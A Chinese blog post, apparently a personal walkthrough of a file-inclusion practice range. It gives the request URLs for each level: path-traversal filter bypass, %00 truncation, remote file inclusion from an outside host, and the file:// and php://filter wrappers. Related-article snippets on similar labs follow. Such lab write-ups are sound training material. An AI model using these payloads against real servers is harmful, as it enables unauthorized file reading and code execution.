DAY15:文件包含漏洞靶场手册(自用 file-include 靶场)

最新推荐文章于 2024-07-21 11:53:10 发布
最新推荐文章于 2024-07-21 11:53:10 发布
阅读量760 收藏 2
点赞数 1
文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49433473/article/details/126023708
版权

DAY15:文件包含漏洞靶场过关手册(自用 file-include 靶场)

Pass-01、基础file读取

http://172.16.0.193/file-include/01/index.php?file=1.txt

请添加图片描述

解析 1.txt 内容为 php 格式,phpinfo 解析成功

Pass-03、过滤 …/(路径双写拼接)

使用:

.+ ../ +./          --------当作一个 ../

查看上一目录的 info.txt

请添加图片描述请添加图片描述请添加图片描述

Pass-04、%00 截断

需要 php版本小于 5.3.8 以及 magic_quotes_gpc = Off

请添加图片描述
请添加图片描述

172.16.0.193/file-include/04/index.php?file=1.txt%00

Pass-05、远程文件包含

php 版本:5.2.17

(1)远程包含文件路径必须为绝对路径

(2)被包含的文件不能够被服务器解析,如php文件

请添加图片描述

172.16.0.193/file-include/05/index.php?file=http://123.56.226.153/info.txt

Pass-07、file://伪协议

php 版本:5.2.17

(1)file:// — 用于访问本地文件系统
(2)php版本:5.0以上
(3)是 PHP 使用的默认封装协议
(4)当指定了一个相对路径(不以/、\、\\或 Windows 盘符开头的路径)提供的路径将基于当前的工作目录
(5)该协议的语法:php://filter:/<action>=<name>

包含文件路径必须为绝对路径

http://172.16.0.193/file-include/07/index.php?file=file:D:\phpStudy\PHPTutorial\WWW\file-include\07\flag.tx

http://172.16.0.193/file-include/07/index.php?file=php://filter/read=convert.base64-
encode/resource=flag.txt

convert.base64-encode:将数据流中的内容转换为base64编码

请添加图片描述

base64-encode:将数据流中的内容转换为base64编码


[外链图片转存中...(img-s9kVOVKe-1658928781945)]
EdmunDJK
关注
File Inclusion(文件包含)
raynah的博客
06-30 427
File Inclusion(文件包含漏洞)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文...
WordPress插件File-Manager任意文件上传漏洞复现
玄道的网安博客
10-12 4331
简介 WordPress插件WPFileManager中存在一个严重的0day安全漏洞,攻击者可以在安装了此插件的任何WordPress网站上任意上传文件并远程执行代码。 影响版本 File Manager 6.0-6.8 环境搭建 Wordpress下载地址 https://cn.wordpress.org/wordpress-5.4.1-zh_CN.tar.gz 插件下载地址 http://plugins.svn.wordpress.org/wp-file-ma...
文件包含漏洞--pikachu靶场
嘿嘿嘿
05-19 859
2.include "include/$filename"---这是23行的内容也是漏洞的成因,因为将用户的get请求中的参数直接无条件的放入include语句去执行。通过下拉菜单选择球星实际是发送不同的get请求回显对应内容,文件包含漏洞的关键是文件包含函数(include/require)身份对参数有严格定义,因此我们是要找到能调用文件包含php文件。文件包含并不属于漏洞,但是,由于对包含进来的文件不可控,导致了文件包含漏洞的产生。:在包含文件时,如果找不到包含的文件,它只会产生告警,页面的。
网络安全实验-文件上传漏洞文件包含漏洞、CSRF漏洞
最新发布
qlbahuang的博客
07-21 1068
网络安全实验:文件上传,文件包含,CSRF
DVWA靶场-文件包含漏洞FileInclusion)
zeroone的博客
01-16 3599
第四关:file inclusion(文件包含漏洞)       File Inclusion,文件包含漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含
pikachu之文件包含漏洞
weixin_51446936的博客
06-09 2199
一、文件包含漏洞概述 在web后台开发中,程序员往往为了提高效率以及让代码看起来更简洁,会使用“包含”函数功能。比如把一系列功能函数都写进function.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include function.php?>就可以调用函数代码 但有些时候,因为网站功能需求,会让前端用户选择需要包含的文件(或者在前端的功能中使用了“包含”功能),又由于开发人员没有对要包含的这个文件进行安全考虑,就导致攻击者可以通过修改包含文件的位置来让后台执行任意
iwebsec靶场文件包含
果粒程
03-02 1246
iwebsec靶场文件包含
php反序列化靶场,集合了常见的php反序列化漏洞——由这周末在做梦制作.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
安全基础:0-day漏洞
知行合一 止于至善
06-09 5825
这篇文章以阿里巴巴的FastJSon来介绍一下Zero-day(0-day)漏洞的基础常识。
web安全day38:使用Vulhub一键搭建测试靶场
小梁的博客
01-05 885
Vulhub是一个基于docker和docker-compose的漏*洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏*洞环境,让漏*洞复现变得更加简单,让安全研究者更加专注于漏*洞原理本身。 它对于初学者学习安防很有帮助。 ​​它的官网是​​​​https://vulhub.org/​​。​​ ​使用Vulhub需要​安装 docker 和 docker-compose。 安装docker redhat下安装docker可以参照​​https://docs.docker.com/e..
文件上传漏之upload靶场练习——渗透day12
qq_62716256的博客
09-12 1548
文件上传漏之upload练习——渗透day12
文件包含靶场
2301_77425356的博客
05-08 159
我们看下这个目录,因为他是linux肯定有的目录,我们记住他反馈的位置,后面就可以知道反馈在哪里了。我们用WindTerm连接,在用户上插入我们的马(打印是为了看自己的PHP语句是否成功执行)这里也可以用wfuzz跑出来参数,我们找到了image是参数,找到参数了,我们进行下一步。扫描出各个的端口的服务,看下那个日志可以看,我用的是2211,2211端口开的是xss。同时用nmap进行端口扫描,发现了8888,80和2211端口。我们是查下xss的日志在那个目录下,然后查看后成功包含出数据。
DVWA靶场——File Inclusion(文件包含漏洞)
qq_74806534的博客
01-18 6620
程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含File Inclusion,文件包含漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。
Pikachu靶场--文件包含
qq_65150735的博客
06-18 1201
Pikachu靶场--文件包含
文件包含漏洞实战靶场笔记
weixin_30289831的博客
06-17 1069
记录下自己写的文件包含漏洞靶场的writeup,包括了大部分的文件包含漏洞实战场景,做个笔记。 0x01 无过滤的本地文件包含 <?php $page = isset($_GET['page'])?$_GET['page']:''; include "$page"; ?> 没有任何过滤,可以包含一些敏感文件 常见的敏感信息路径: ...
Pikachu漏洞靶场 File Inclusion(文件包含漏洞
柠檬i的博客
04-06 617
1.本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击着更多的会包含一些 固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。 2.远程文件包含漏洞:能够通过url地址对远程的文件进行包含,这意味着攻击者可以传入任意的代码,这种情况没啥好说的,准备挂彩。 因此,在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数,如果非要这么做,也一定要做严格的白名单策略进行过滤。
iwebsec靶场 文件包含漏洞通关笔记1-本地文件包含漏洞
mooyuan的博客
04-20 1867
文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。比如 在PHP中,提供了:这些文件包含函数,这些函数在代码设计中被经常使用到。
文件包含漏洞(DVWA靶场文件包含漏洞详解)
tmzy1的博客
03-25 1306
浏览器中运行此日志文件,即可执行插入的PHP代码。注意:若是一句话代码,就可以控制此服务器了。查看日志文件已记录此条信息。1、文件包含漏洞形成原因。2、文件包含漏洞的分类。3、PHP包含日志文件。
Pikachu靶场——文件包含漏洞(File Inclusion)
来日可期的博客
10-05 9060
大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是有些时候文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则可能会引发文件包含漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值